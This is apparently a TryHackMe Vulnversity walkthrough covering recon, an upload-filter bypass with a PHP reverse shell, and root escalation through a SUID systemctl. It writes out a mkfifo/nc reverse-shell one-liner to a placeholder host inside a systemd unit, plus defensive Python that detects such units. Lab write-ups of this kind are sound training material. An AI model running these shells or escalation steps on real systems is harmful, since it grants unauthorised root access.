TryHackMe CTF: Vulnversity — Walkthrough

This room mainly focuses on active reconnaissance, web application attacks and privilege escalation.
[Task 1] Deploy the machine
[Task 2] Reconnaissance
Start an nmap scan against the given box:
nmap -sC -sV -oN nmap/initial <ip>

Initial enumeration
We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.
The service banners make it clear that the OS is Ubuntu, and that the web server is running on port 3333.
Scan the box, how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
We explore the HTTP site running on the web server.

None of the site's functions or buttons work, and there is nothing interesting in the page source.

[Task 3] Locating directories using GoBuster
We run a gobuster scan against the given IP on port 3333:
gobuster dir -u <ip>:<port> -w <wordlist-path>

Gobuster Scan
We find an /internal directory and further enumeration leads to /internal/uploads directory.

We find an upload form at the /internal directory.

What is the directory that has an upload form page?
/internal/
[Task 4] Compromise the webserver
We try to upload a PHP reverse shell script, but the extension is filtered.


We start Burp Suite and enable it in FoxyProxy, then create a wordlist of alternative PHP extensions for a Sniper attack.

We capture the upload request and then send it to Intruder.

We load our payload as a simple list.

We add the extension of file in our positions tab for the payload.

We start the attack and examine the results. Every extension returns status 200, but the response length for the .phtml extension differs from the rest.

We upload shell.phtml (a PHP reverse shell) and it is accepted.
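The filter bypass above works because the site rejects a fixed list of extensions and overlooks aliases that the PHP handler still executes. As an added example (not code from the Vulnversity room or this write-up), the Python below contrasts such a denylist with an allowlist check and a server-chosen storage name. The function names, the two extension sets and the sample filenames are my own assumptions, not anything taken from the room.

```python
# Added example, not code from the Vulnversity room or this write-up:
# two versions of an upload filename check, constructed to show why a
# denylist lets shell.phtml through while an allowlist does not.
import posixpath
import secrets

# What a naive filter blocks. Any alias it forgets (.phtml, .phar, .php5,
# ...) is still mapped to the PHP handler on a stock Apache + mod_php host.
DENYLIST = {".php"}

# What the hardened check accepts: only the types the form actually needs.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def denylist_allows(filename: str) -> bool:
    """Vulnerable check: reject only the extensions on the denylist."""
    ext = posixpath.splitext(filename)[1].lower()
    return ext not in DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: a single plain base name with one allowlisted
    extension, no path separators, no double extensions, no NUL bytes."""
    if not filename or "\x00" in filename or "\\" in filename:
        return False
    if posixpath.basename(filename) != filename:      # ../x or /etc/x
        return False
    base, ext = posixpath.splitext(filename)
    if ext.lower() not in ALLOWLIST:
        return False
    if not base or "." in base:                       # shell.php.jpg, .jpg
        return False
    return all(c.isalnum() or c in "-_" for c in base)


def storage_name(filename: str):
    """Name to store an accepted upload under: a random token plus the
    validated extension, so the client never chooses the on-disk name.
    Returns None when the upload is rejected."""
    if not allowlist_allows(filename):
        return None
    ext = posixpath.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "shell.php.jpg", "photo.jpg"):
        print(f"{name:15} denylist={denylist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name)}")
```

Filename validation is only one layer: the upload directory should also be served without any script handler, so that even a file that slips through is returned as bytes rather than executed.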
We start a netcat listener:
nc -lvp 4444

We then go to /internal/uploads and click on our uploaded file, which gives us a reverse shell on our machine. We stabilize the shell.

Currently we are the www-data user. If we have a look at the /etc/passwd file we find a user named bill. We can directly go to /home/bill directory and find our user.txt flag.
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd**************************edb
[Task 5] Privilege Escalation
We check the system for SUID files. A SUID binary runs with the effective user ID of its owner (rather than that of the user who launches it), so a SUID root binary that can execute arbitrary commands hands out root.
find / -perm -u=s -type f 2>/dev/null

We see that /bin/systemctl is a SUID binary. We could use this to gain privileged access. We have a look at GTFOBins and search for systemctl.
Reference: https://gtfobins.github.io/gtfobins/systemctl/

We create a temporary service and then use that to view root.txt file.
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

In the same way we can get a reverse shell with root privileges.
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
ken=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc <ip> <port>"
[Install]
WantedBy=multi-user.target' >$ken
/bin/systemctl link $ken
/bin/systemctl enable --now $ken

This spawns a reverse shell on our machine with root access.
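From the defender's side, both escalation steps above leave the same two traces: a SUID bit on a binary that should not carry one, and a unit file linked from a temporary directory whose ExecStart writes to /tmp or pipes a shell through nc. As an added example (not code from the room or this write-up), the Python below audits the output of the page's find command against a baseline and inspects unit file text for that pattern. The baseline set, the sample find output and the sample unit contents are constructed by me for the example.

```python
# Added example, not code from the Vulnversity room or this write-up:
# audit `find / -perm -u=s -type f` output against a SUID baseline and
# flag systemd unit files shaped like the escalation on this box.
import re

# Constructed baseline: SUID root binaries normally present on a stock
# Ubuntu 16.04 host. A real deployment takes this from a golden image.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Constructed sample of what the find command printed on a host where
# systemctl (and a local helper) had been given the SUID bit.
SAMPLE_FIND_OUTPUT = """\
/bin/ping
/bin/su
/bin/mount
/bin/systemctl
/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/backup-helper
"""

# Constructed sample units: the root.txt read from the page, and a service
# shaped like the nc reverse shell (placeholders instead of a real address).
SAMPLE_UNIT_READ = """\
[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target
"""
SAMPLE_UNIT_SHELL = """\
[Service]
ExecStart=/bin/sh -c "/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc ATTACKER_IP ATTACKER_PORT"
[Install]
WantedBy=multi-user.target
"""

# Directories a unit file should never be loaded from or operate in.
UNTRUSTED_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")


def unexpected_suid(find_output: str, baseline=BASELINE_SUID) -> list:
    """Return SUID paths that are not in the baseline, sorted."""
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(found - baseline)


def suspicious_unit(unit_text: str) -> list:
    """Return the reasons an ExecStart= line looks like an escalation
    artefact: untrusted directories, fifo/network tools, interactive shell."""
    reasons = []
    for line in unit_text.splitlines():
        if not line.startswith("ExecStart="):
            continue
        cmd = line[len("ExecStart="):]
        if any(d in cmd for d in UNTRUSTED_DIRS):
            reasons.append("ExecStart references untrusted directory")
        if re.search(r"\b(nc|ncat|netcat|mkfifo)\b", cmd):
            reasons.append("ExecStart invokes network/fifo utility")
        if re.search(r"\b(bash|sh)\b.*\s-i\b", cmd):
            reasons.append("ExecStart spawns interactive shell")
    return reasons


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SAMPLE_FIND_OUTPUT))
    print("read unit:", suspicious_unit(SAMPLE_UNIT_READ))
    print("shell unit:", suspicious_unit(SAMPLE_UNIT_SHELL))
```

The remediation on this box is simply `chmod u-s /bin/systemctl`; the audit is what tells you that it is needed, and running it periodically (or on a file-integrity schedule) catches the bit being set again.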

On the system, search for all SUID files. What file stands out?
/bin/systemctl
Become root and get the last flag (/root/root.txt)
a58**************************fd5